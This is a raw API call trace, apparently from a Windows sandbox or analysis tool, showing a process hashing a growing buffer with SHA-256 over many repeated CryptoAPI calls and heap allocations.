	[0225.992] CryptGetHashParam (in: hHash=0x22b6ac0, dwParam=0x2, pbData=0x277b700, pdwDataLen=0x1284a8, dwFlags=0x0 | out: pbData=0x277b700, pdwDataLen=0x1284a8) returned 1
	[0225.992] CryptDestroyHash (hHash=0x22b6ac0) returned 1
	[0225.992] CryptReleaseContext (hProv=0x225c98, dwFlags=0x0) returned 1
	[0225.992] CryptAcquireContextW (in: phProv=0x1284ac, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1284ac*=0x225c98) returned 1
	[0225.993] CryptCreateHash (in: hProv=0x225c98, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1284b0 | out: phHash=0x1284b0) returned 1
	[0225.993] CryptHashData (hHash=0x22b69c0, pbData=0x2761c48, dwDataLen=0x320, dwFlags=0x0) returned 1
	[0225.993] CryptGetHashParam (in: hHash=0x22b69c0, dwParam=0x4, pbData=0x1284a8, pdwDataLen=0x1284a4, dwFlags=0x0 | out: pbData=0x1284a8, pdwDataLen=0x1284a4) returned 1
	[0225.993] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x277b728
	[0225.993] CryptGetHashParam (in: hHash=0x22b69c0, dwParam=0x2, pbData=0x277b728, pdwDataLen=0x1284a8, dwFlags=0x0 | out: pbData=0x277b728, pdwDataLen=0x1284a8) returned 1
	[0225.993] CryptDestroyHash (hHash=0x22b69c0) returned 1
	[0225.993] CryptReleaseContext (hProv=0x225c98, dwFlags=0x0) returned 1
	[0225.993] CryptAcquireContextW (in: phProv=0x1284ac, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1284ac*=0x225c98) returned 1
	[0225.993] CryptCreateHash (in: hProv=0x225c98, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1284b0 | out: phHash=0x1284b0) returned 1
	[0225.993] CryptHashData (hHash=0x22b6ac0, pbData=0x2761c48, dwDataLen=0x340, dwFlags=0x0) returned 1
	[0225.993] CryptGetHashParam (in: hHash=0x22b6ac0, dwParam=0x4, pbData=0x1284a8, pdwDataLen=0x1284a4, dwFlags=0x0 | out: pbData=0x1284a8, pdwDataLen=0x1284a4) returned 1
	[0225.993] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x277b750
	[0225.993] CryptGetHashParam (in: hHash=0x22b6ac0, dwParam=0x2, pbData=0x277b750, pdwDataLen=0x1284a8, dwFlags=0x0 | out: pbData=0x277b750, pdwDataLen=0x1284a8) returned 1
	[0225.993] CryptDestroyHash (hHash=0x22b6ac0) returned 1
	[0225.993] CryptReleaseContext (hProv=0x225c98, dwFlags=0x0) returned 1
	[0225.993] CryptAcquireContextW (in: phProv=0x1284ac, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1284ac*=0x225c98) returned 1
	[0225.994] CryptCreateHash (in: hProv=0x225c98, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1284b0 | out: phHash=0x1284b0) returned 1
	[0225.994] CryptHashData (hHash=0x22b69c0, pbData=0x2761c48, dwDataLen=0x360, dwFlags=0x0) returned 1
	[0225.994] CryptGetHashParam (in: hHash=0x22b69c0, dwParam=0x4, pbData=0x1284a8, pdwDataLen=0x1284a4, dwFlags=0x0 | out: pbData=0x1284a8, pdwDataLen=0x1284a4) returned 1
	[0225.994] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x277b778
	[0225.994] CryptGetHashParam (in: hHash=0x22b69c0, dwParam=0x2, pbData=0x277b778, pdwDataLen=0x1284a8, dwFlags=0x0 | out: pbData=0x277b778, pdwDataLen=0x1284a8) returned 1
	[0225.994] CryptDestroyHash (hHash=0x22b69c0) returned 1
	[0225.994] CryptReleaseContext (hProv=0x225c98, dwFlags=0x0) returned 1
	[0225.994] CryptAcquireContextW (in: phProv=0x1284ac, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1284ac*=0x225c98) returned 1
	[0225.994] CryptCreateHash (in: hProv=0x225c98, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1284b0 | out: phHash=0x1284b0) returned 1
	[0225.994] CryptHashData (hHash=0x22b6ac0, pbData=0x2761c48, dwDataLen=0x380, dwFlags=0x0) returned 1
	[0225.994] CryptGetHashParam (in: hHash=0x22b6ac0, dwParam=0x4, pbData=0x1284a8, pdwDataLen=0x1284a4, dwFlags=0x0 | out: pbData=0x1284a8, pdwDataLen=0x1284a4) returned 1
	[0225.994] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x277b7a0
	[0225.994] CryptGetHashParam (in: hHash=0x22b6ac0, dwParam=0x2, pbData=0x277b7a0, pdwDataLen=0x1284a8, dwFlags=0x0 | out: pbData=0x277b7a0, pdwDataLen=0x1284a8) returned 1
	[0225.994] CryptDestroyHash (hHash=0x22b6ac0) returned 1
	[0225.994] CryptReleaseContext (hProv=0x225c98, dwFlags=0x0) returned 1
	[0225.995] CryptAcquireContextW (in: phProv=0x1284ac, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1284ac*=0x225c98) returned 1
	[0225.995] CryptCreateHash (in: hProv=0x225c98, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1284b0 | out: phHash=0x1284b0) returned 1
	[0225.995] CryptHashData (hHash=0x22b69c0, pbData=0x2761c48, dwDataLen=0x3a0, dwFlags=0x0) returned 1
	[0225.995] CryptGetHashParam (in: hHash=0x22b69c0, dwParam=0x4, pbData=0x1284a8, pdwDataLen=0x1284a4, dwFlags=0x0 | out: pbData=0x1284a8, pdwDataLen=0x1284a4) returned 1
	[0225.995] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x277b7c8
	[0225.995] CryptGetHashParam (in: hHash=0x22b69c0, dwParam=0x2, pbData=0x277b7c8, pdwDataLen=0x1284a8, dwFlags=0x0 | out: pbData=0x277b7c8, pdwDataLen=0x1284a8) returned 1
	[0225.995] CryptDestroyHash (hHash=0x22b69c0) returned 1
	[0225.995] CryptReleaseContext (hProv=0x225c98, dwFlags=0x0) returned 1
	[0225.995] CryptAcquireContextW (in: phProv=0x1284ac, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1284ac*=0x225c98) returned 1
	[0225.995] CryptCreateHash (in: hProv=0x225c98, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1284b0 | out: phHash=0x1284b0) returned 1
	[0225.995] CryptHashData (hHash=0x22b6ac0, pbData=0x2761c48, dwDataLen=0x3c0, dwFlags=0x0) returned 1
	[0225.995] CryptGetHashParam (in: hHash=0x22b6ac0, dwParam=0x4, pbData=0x1284a8, pdwDataLen=0x1284a4, dwFlags=0x0 | out: pbData=0x1284a8, pdwDataLen=0x1284a4) returned 1
	[0225.995] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x277b7f0
	[0225.996] CryptGetHashParam (in: hHash=0x22b6ac0, dwParam=0x2, pbData=0x277b7f0, pdwDataLen=0x1284a8, dwFlags=0x0 | out: pbData=0x277b7f0, pdwDataLen=0x1284a8) returned 1
	[0225.996] CryptDestroyHash (hHash=0x22b6ac0) returned 1
	[0225.996] CryptReleaseContext (hProv=0x225c98, dwFlags=0x0) returned 1
	[0225.996] CryptAcquireContextW (in: phProv=0x1284ac, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1284ac*=0x225c98) returned 1
	[0225.996] CryptCreateHash (in: hProv=0x225c98, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1284b0 | out: phHash=0x1284b0) returned 1
	[0225.996] CryptHashData (hHash=0x22b69c0, pbData=0x2761c48, dwDataLen=0x3e0, dwFlags=0x0) returned 1
	[0225.996] CryptGetHashParam (in: hHash=0x22b69c0, dwParam=0x4, pbData=0x1284a8, pdwDataLen=0x1284a4, dwFlags=0x0 | out: pbData=0x1284a8, pdwDataLen=0x1284a4) returned 1
	[0225.996] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x277b818
	[0225.996] CryptGetHashParam (in: hHash=0x22b69c0, dwParam=0x2, pbData=0x277b818, pdwDataLen=0x1284a8, dwFlags=0x0 | out: pbData=0x277b818, pdwDataLen=0x1284a8) returned 1
	[0225.996] CryptDestroyHash (hHash=0x22b69c0) returned 1
	[0225.996] CryptReleaseContext (hProv=0x225c98, dwFlags=0x0) returned 1
	[0225.996] CryptAcquireContextW (in: phProv=0x1284ac, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1284ac*=0x225c98) returned 1
	[0225.996] CryptCreateHash (in: hProv=0x225c98, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1284b0 | out: phHash=0x1284b0) returned 1
	[0225.997] CryptHashData (hHash=0x22b6ac0, pbData=0x2761c48, dwDataLen=0x400, dwFlags=0x0) returned 1
	[0225.997] CryptGetHashParam (in: hHash=0x22b6ac0, dwParam=0x4, pbData=0x1284a8, pdwDataLen=0x1284a4, dwFlags=0x0 | out: pbData=0x1284a8, pdwDataLen=0x1284a4) returned 1
	[0225.997] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x277b840
	[0225.997] CryptGetHashParam (in: hHash=0x22b6ac0, dwParam=0x2, pbData=0x277b840, pdwDataLen=0x1284a8, dwFlags=0x0 | out: pbData=0x277b840, pdwDataLen=0x1284a8) returned 1
	[0225.997] CryptDestroyHash (hHash=0x22b6ac0) returned 1
	[0225.997] CryptReleaseContext (hProv=0x225c98, dwFlags=0x0) returned 1
	[0225.997] CryptAcquireContextW (in: phProv=0x1284ac, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1284ac*=0x225c98) returned 1
	[0225.997] CryptCreateHash (in: hProv=0x225c98, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1284b0 | out: phHash=0x1284b0) returned 1
	[0225.997] CryptHashData (hHash=0x22b69c0, pbData=0x2761c48, dwDataLen=0x420, dwFlags=0x0) returned 1
	[0225.997] CryptGetHashParam (in: hHash=0x22b69c0, dwParam=0x4, pbData=0x1284a8, pdwDataLen=0x1284a4, dwFlags=0x0 | out: pbData=0x1284a8, pdwDataLen=0x1284a4) returned 1
	[0225.997] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x277b868
	[0225.997] CryptGetHashParam (in: hHash=0x22b69c0, dwParam=0x2, pbData=0x277b868, pdwDataLen=0x1284a8, dwFlags=0x0 | out: pbData=0x277b868, pdwDataLen=0x1284a8) returned 1
	[0225.997] CryptDestroyHash (hHash=0x22b69c0) returned 1
	[0225.997] CryptReleaseContext (hProv=0x225c98, dwFlags=0x0) returned 1
	[0225.997] CryptAcquireContextW (in: phProv=0x1284ac, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1284ac*=0x225c98) returned 1
	[0225.998] CryptCreateHash (in: hProv=0x225c98, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1284b0 | out: phHash=0x1284b0) returned 1
	[0225.998] CryptHashData (hHash=0x22b6ac0, pbData=0x2761c48, dwDataLen=0x440, dwFlags=0x0) returned 1
	[0225.998] CryptGetHashParam (in: hHash=0x22b6ac0, dwParam=0x4, pbData=0x1284a8, pdwDataLen=0x1284a4, dwFlags=0x0 | out: pbData=0x1284a8, pdwDataLen=0x1284a4) returned 1
	[0225.998] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x277b890
	[0225.998] CryptGetHashParam (in: hHash=0x22b6ac0, dwParam=0x2, pbData=0x277b890, pdwDataLen=0x1284a8, dwFlags=0x0 | out: pbData=0x277b890, pdwDataLen=0x1284a8) returned 1
	[0225.998] CryptDestroyHash (hHash=0x22b6ac0) returned 1
	[0225.998] CryptReleaseContext (hProv=0x225c98, dwFlags=0x0) returned 1
	[0225.998] CryptAcquireContextW (in: phProv=0x1284ac, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1284ac*=0x225c98) returned 1
	[0225.998] CryptCreateHash (in: hProv=0x225c98, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1284b0 | out: phHash=0x1284b0) returned 1
	[0225.998] CryptHashData (hHash=0x22b69c0, pbData=0x2761c48, dwDataLen=0x460, dwFlags=0x0) returned 1
	[0225.998] CryptGetHashParam (in: hHash=0x22b69c0, dwParam=0x4, pbData=0x1284a8, pdwDataLen=0x1284a4, dwFlags=0x0 | out: pbData=0x1284a8, pdwDataLen=0x1284a4) returned 1
	[0225.998] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x277b8b8
	[0225.998] CryptGetHashParam (in: hHash=0x22b69c0, dwParam=0x2, pbData=0x277b8b8, pdwDataLen=0x1284a8, dwFlags=0x0 | out: pbData=0x277b8b8, pdwDataLen=0x1284a8) returned 1
	[0225.998] CryptDestroyHash (hHash=0x22b69c0) returned 1
	[0225.998] CryptReleaseContext (hProv=0x225c98, dwFlags=0x0) returned 1
	[0225.998] CryptAcquireContextW (in: phProv=0x1284ac, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1284ac*=0x225c98) returned 1
	[0225.999] CryptCreateHash (in: hProv=0x225c98, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1284b0 | out: phHash=0x1284b0) returned 1
	[0225.999] CryptHashData (hHash=0x22b6ac0, pbData=0x2761c48, dwDataLen=0x480, dwFlags=0x0) returned 1
	[0225.999] CryptGetHashParam (in: hHash=0x22b6ac0, dwParam=0x4, pbData=0x1284a8, pdwDataLen=0x1284a4, dwFlags=0x0 | out: pbData=0x1284a8, pdwDataLen=0x1284a4) returned 1
	[0225.999] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x277b8e0
	[0225.999] CryptGetHashParam (in: hHash=0x22b6ac0, dwParam=0x2, pbData=0x277b8e0, pdwDataLen=0x1284a8, dwFlags=0x0 | out: pbData=0x277b8e0, pdwDataLen=0x1284a8) returned 1
	[0225.999] CryptDestroyHash (hHash=0x22b6ac0) returned 1
	[0225.999] CryptReleaseContext (hProv=0x225c98, dwFlags=0x0) returned 1
	[0225.999] CryptAcquireContextW (in: phProv=0x1284ac, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1284ac*=0x225c98) returned 1
	[0225.999] CryptCreateHash (in: hProv=0x225c98, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1284b0 | out: phHash=0x1284b0) returned 1
	[0225.999] CryptHashData (hHash=0x22b69c0, pbData=0x2761c48, dwDataLen=0x4a0, dwFlags=0x0) returned 1
	[0225.999] CryptGetHashParam (in: hHash=0x22b69c0, dwParam=0x4, pbData=0x1284a8, pdwDataLen=0x1284a4, dwFlags=0x0 | out: pbData=0x1284a8, pdwDataLen=0x1284a4) returned 1
	[0225.999] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x277b908
	[0225.999] CryptGetHashParam (in: hHash=0x22b69c0, dwParam=0x2, pbData=0x277b908, pdwDataLen=0x1284a8, dwFlags=0x0 | out: pbData=0x277b908, pdwDataLen=0x1284a8) returned 1
	[0225.999] CryptDestroyHash (hHash=0x22b69c0) returned 1
	[0225.999] CryptReleaseContext (hProv=0x225c98, dwFlags=0x0) returned 1
	[0225.999] CryptAcquireContextW (in: phProv=0x1284ac, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1284ac*=0x225c98) returned 1
	[0226.000] CryptCreateHash (in: hProv=0x225c98, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1284b0 | out: phHash=0x1284b0) returned 1
	[0226.000] CryptHashData (hHash=0x22b6ac0, pbData=0x2761c48, dwDataLen=0x4c0, dwFlags=0x0) returned 1
	[0226.000] CryptGetHashParam (in: hHash=0x22b6ac0, dwParam=0x4, pbData=0x1284a8, pdwDataLen=0x1284a4, dwFlags=0x0 | out: pbData=0x1284a8, pdwDataLen=0x1284a4) returned 1
	[0226.000] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x277b930
	[0226.000] CryptGetHashParam (in: hHash=0x22b6ac0, dwParam=0x2, pbData=0x277b930, pdwDataLen=0x1284a8, dwFlags=0x0 | out: pbData=0x277b930, pdwDataLen=0x1284a8) returned 1
	[0226.000] CryptDestroyHash (hHash=0x22b6ac0) returned 1
	[0226.000] CryptReleaseContext (hProv=0x225c98, dwFlags=0x0) returned 1
	[0226.000] CryptAcquireContextW (in: phProv=0x1284ac, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1284ac*=0x225c98) returned 1
	[0226.000] CryptCreateHash (in: hProv=0x225c98, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1284b0 | out: phHash=0x1284b0) returned 1
	[0226.000] CryptHashData (hHash=0x22b69c0, pbData=0x2761c48, dwDataLen=0x4e0, dwFlags=0x0) returned 1
	[0226.000] CryptGetHashParam (in: hHash=0x22b69c0, dwParam=0x4, pbData=0x1284a8, pdwDataLen=0x1284a4, dwFlags=0x0 | out: pbData=0x1284a8, pdwDataLen=0x1284a4) returned 1
	[0226.000] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x277b958
	[0226.000] CryptGetHashParam (in: hHash=0x22b69c0, dwParam=0x2, pbData=0x277b958, pdwDataLen=0x1284a8, dwFlags=0x0 | out: pbData=0x277b958, pdwDataLen=0x1284a8) returned 1
	[0226.000] CryptDestroyHash (hHash=0x22b69c0) returned 1
	[0226.001] CryptReleaseContext (hProv=0x225c98, dwFlags=0x0) returned 1
	[0226.001] CryptAcquireContextW (in: phProv=0x1284ac, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1284ac*=0x225c98) returned 1
	[0226.001] CryptCreateHash (in: hProv=0x225c98, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1284b0 | out: phHash=0x1284b0) returned 1
	[0226.001] CryptHashData (hHash=0x22b6ac0, pbData=0x2761c48, dwDataLen=0x500, dwFlags=0x0) returned 1
	[0226.001] CryptGetHashParam (in: hHash=0x22b6ac0, dwParam=0x4, pbData=0x1284a8, pdwDataLen=0x1284a4, dwFlags=0x0 | out: pbData=0x1284a8, pdwDataLen=0x1284a4) returned 1
	[0226.001] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x277b980
	[0226.001] CryptGetHashParam (in: hHash=0x22b6ac0, dwParam=0x2, pbData=0x277b980, pdwDataLen=0x1284a8, dwFlags=0x0 | out: pbData=0x277b980, pdwDataLen=0x1284a8) returned 1
	[0226.001] CryptDestroyHash (hHash=0x22b6ac0) returned 1
	[0226.001] CryptReleaseContext (hProv=0x225c98, dwFlags=0x0) returned 1
	[0226.001] CryptAcquireContextW (in: phProv=0x1284ac, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1284ac*=0x225c98) returned 1
	[0226.001] CryptCreateHash (in: hProv=0x225c98, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1284b0 | out: phHash=0x1284b0) returned 1
	[0226.001] CryptHashData (hHash=0x22b69c0, pbData=0x2761c48, dwDataLen=0x520, dwFlags=0x0) returned 1
	[0226.001] CryptGetHashParam (in: hHash=0x22b69c0, dwParam=0x4, pbData=0x1284a8, pdwDataLen=0x1284a4, dwFlags=0x0 | out: pbData=0x1284a8, pdwDataLen=0x1284a4) returned 1
	[0226.002] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x277b9a8
	[0226.002] CryptGetHashParam (in: hHash=0x22b69c0, dwParam=0x2, pbData=0x277b9a8, pdwDataLen=0x1284a8, dwFlags=0x0 | out: pbData=0x277b9a8, pdwDataLen=0x1284a8) returned 1
	[0226.002] CryptDestroyHash (hHash=0x22b69c0) returned 1
	[0226.002] CryptReleaseContext (hProv=0x225c98, dwFlags=0x0) returned 1
	[0226.002] CryptAcquireContextW (in: phProv=0x1284ac, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1284ac*=0x225c98) returned 1
	[0226.002] CryptCreateHash (in: hProv=0x225c98, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1284b0 | out: phHash=0x1284b0) returned 1
	[0226.002] CryptHashData (hHash=0x22b6ac0, pbData=0x2761c48, dwDataLen=0x540, dwFlags=0x0) returned 1
	[0226.002] CryptGetHashParam (in: hHash=0x22b6ac0, dwParam=0x4, pbData=0x1284a8, pdwDataLen=0x1284a4, dwFlags=0x0 | out: pbData=0x1284a8, pdwDataLen=0x1284a4) returned 1
	[0226.002] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x277b9d0
	[0226.002] CryptGetHashParam (in: hHash=0x22b6ac0, dwParam=0x2, pbData=0x277b9d0, pdwDataLen=0x1284a8, dwFlags=0x0 | out: pbData=0x277b9d0, pdwDataLen=0x1284a8) returned 1
	[0226.002] CryptDestroyHash (hHash=0x22b6ac0) returned 1
	[0226.002] CryptReleaseContext (hProv=0x225c98, dwFlags=0x0) returned 1
	[0226.002] CryptAcquireContextW (in: phProv=0x1284ac, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1284ac*=0x225c98) returned 1
	[0226.002] CryptCreateHash (in: hProv=0x225c98, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1284b0 | out: phHash=0x1284b0) returned 1
	[0226.002] CryptHashData (hHash=0x22b69c0, pbData=0x2761c48, dwDataLen=0x560, dwFlags=0x0) returned 1
	[0226.003] CryptGetHashParam (in: hHash=0x22b69c0, dwParam=0x4, pbData=0x1284a8, pdwDataLen=0x1284a4, dwFlags=0x0 | out: pbData=0x1284a8, pdwDataLen=0x1284a4) returned 1
	[0226.003] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x277b9f8
	[0226.003] CryptGetHashParam (in: hHash=0x22b69c0, dwParam=0x2, pbData=0x277b9f8, pdwDataLen=0x1284a8, dwFlags=0x0 | out: pbData=0x277b9f8, pdwDataLen=0x1284a8) returned 1
	[0226.003] CryptDestroyHash (hHash=0x22b69c0) returned 1
	[0226.003] CryptReleaseContext (hProv=0x225c98, dwFlags=0x0) returned 1
	[0226.003] CryptAcquireContextW (in: phProv=0x1284ac, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1284ac*=0x225c98) returned 1
	[0226.003] CryptCreateHash (in: hProv=0x225c98, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1284b0 | out: phHash=0x1284b0) returned 1
	[0226.003] CryptHashData (hHash=0x22b6ac0, pbData=0x2761c48, dwDataLen=0x580, dwFlags=0x0) returned 1
	[0226.003] CryptGetHashParam (in: hHash=0x22b6ac0, dwParam=0x4, pbData=0x1284a8, pdwDataLen=0x1284a4, dwFlags=0x0 | out: pbData=0x1284a8, pdwDataLen=0x1284a4) returned 1
	[0226.003] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x277ba20
	[0226.003] CryptGetHashParam (in: hHash=0x22b6ac0, dwParam=0x2, pbData=0x277ba20, pdwDataLen=0x1284a8, dwFlags=0x0 | out: pbData=0x277ba20, pdwDataLen=0x1284a8) returned 1
	[0226.003] CryptDestroyHash (hHash=0x22b6ac0) returned 1
	[0226.003] CryptReleaseContext (hProv=0x225c98, dwFlags=0x0) returned 1
	[0226.003] CryptAcquireContextW (in: phProv=0x1284ac, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1284ac*=0x225c98) returned 1
	[0226.004] CryptCreateHash (in: hProv=0x225c98, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1284b0 | out: phHash=0x1284b0) returned 1
	[0226.004] CryptHashData (hHash=0x22b69c0, pbData=0x2761c48, dwDataLen=0x5a0, dwFlags=0x0) returned 1
	[0226.004] CryptGetHashParam (in: hHash=0x22b69c0, dwParam=0x4, pbData=0x1284a8, pdwDataLen=0x1284a4, dwFlags=0x0 | out: pbData=0x1284a8, pdwDataLen=0x1284a4) returned 1
	[0226.004] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x277ba48
	[0226.004] CryptGetHashParam (in: hHash=0x22b69c0, dwParam=0x2, pbData=0x277ba48, pdwDataLen=0x1284a8, dwFlags=0x0 | out: pbData=0x277ba48, pdwDataLen=0x1284a8) returned 1
	[0226.004] CryptDestroyHash (hHash=0x22b69c0) returned 1
	[0226.004] CryptReleaseContext (hProv=0x225c98, dwFlags=0x0) returned 1
	[0226.004] CryptAcquireContextW (in: phProv=0x1284ac, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1284ac*=0x225c98) returned 1
	[0226.004] CryptCreateHash (in: hProv=0x225c98, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1284b0 | out: phHash=0x1284b0) returned 1
	[0226.004] CryptHashData (hHash=0x22b6ac0, pbData=0x2761c48, dwDataLen=0x5c0, dwFlags=0x0) returned 1
	[0226.004] CryptGetHashParam (in: hHash=0x22b6ac0, dwParam=0x4, pbData=0x1284a8, pdwDataLen=0x1284a4, dwFlags=0x0 | out: pbData=0x1284a8, pdwDataLen=0x1284a4) returned 1
	[0226.004] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x277ba70
	[0226.004] CryptGetHashParam (in: hHash=0x22b6ac0, dwParam=0x2, pbData=0x277ba70, pdwDataLen=0x1284a8, dwFlags=0x0 | out: pbData=0x277ba70, pdwDataLen=0x1284a8) returned 1
	[0226.004] CryptDestroyHash (hHash=0x22b6ac0) returned 1
	[0226.004] CryptReleaseContext (hProv=0x225c98, dwFlags=0x0) returned 1
	[0226.004] CryptAcquireContextW (in: phProv=0x1284ac, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1284ac*=0x225c98) returned 1
	[0226.005] CryptCreateHash (in: hProv=0x225c98, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1284b0 | out: phHash=0x1284b0) returned 1
	[0226.005] CryptHashData (hHash=0x22b69c0, pbData=0x2761c48, dwDataLen=0x5e0, dwFlags=0x0) returned 1
	[0226.005] CryptGetHashParam (in: hHash=0x22b69c0, dwParam=0x4, pbData=0x1284a8, pdwDataLen=0x1284a4, dwFlags=0x0 | out: pbData=0x1284a8, pdwDataLen=0x1284a4) returned 1
	[0226.005] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x277ba98
	[0226.005] CryptGetHashParam (in: hHash=0x22b69c0, dwParam=0x2, pbData=0x277ba98, pdwDataLen=0x1284a8, dwFlags=0x0 | out: pbData=0x277ba98, pdwDataLen=0x1284a8) returned 1
	[0226.005] CryptDestroyHash (hHash=0x22b69c0) returned 1
	[0226.005] CryptReleaseContext (hProv=0x225c98, dwFlags=0x0) returned 1
	[0226.005] CryptAcquireContextW (in: phProv=0x1284ac, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1284ac*=0x225c98) returned 1
	[0226.005] CryptCreateHash (in: hProv=0x225c98, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1284b0 | out: phHash=0x1284b0) returned 1
	[0226.005] CryptHashData (hHash=0x22b6ac0, pbData=0x2761c48, dwDataLen=0x600, dwFlags=0x0) returned 1
	[0226.005] CryptGetHashParam (in: hHash=0x22b6ac0, dwParam=0x4, pbData=0x1284a8, pdwDataLen=0x1284a4, dwFlags=0x0 | out: pbData=0x1284a8, pdwDataLen=0x1284a4) returned 1
	[0226.005] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x277bac0
	[0226.005] CryptGetHashParam (in: hHash=0x22b6ac0, dwParam=0x2, pbData=0x277bac0, pdwDataLen=0x1284a8, dwFlags=0x0 | out: pbData=0x277bac0, pdwDataLen=0x1284a8) returned 1
	[0226.005] CryptDestroyHash (hHash=0x22b6ac0) returned 1
	[0226.005] CryptReleaseContext (hProv=0x225c98, dwFlags=0x0) returned 1
	[0226.005] CryptAcquireContextW (in: phProv=0x1284ac, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1284ac*=0x225c98) returned 1
	[0226.006] CryptCreateHash (in: hProv=0x225c98, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1284b0 | out: phHash=0x1284b0) returned 1
	[0226.006] CryptHashData (hHash=0x22b69c0, pbData=0x2761c48, dwDataLen=0x620, dwFlags=0x0) returned 1
	[0226.006] CryptGetHashParam (in: hHash=0x22b69c0, dwParam=0x4, pbData=0x1284a8, pdwDataLen=0x1284a4, dwFlags=0x0 | out: pbData=0x1284a8, pdwDataLen=0x1284a4) returned 1
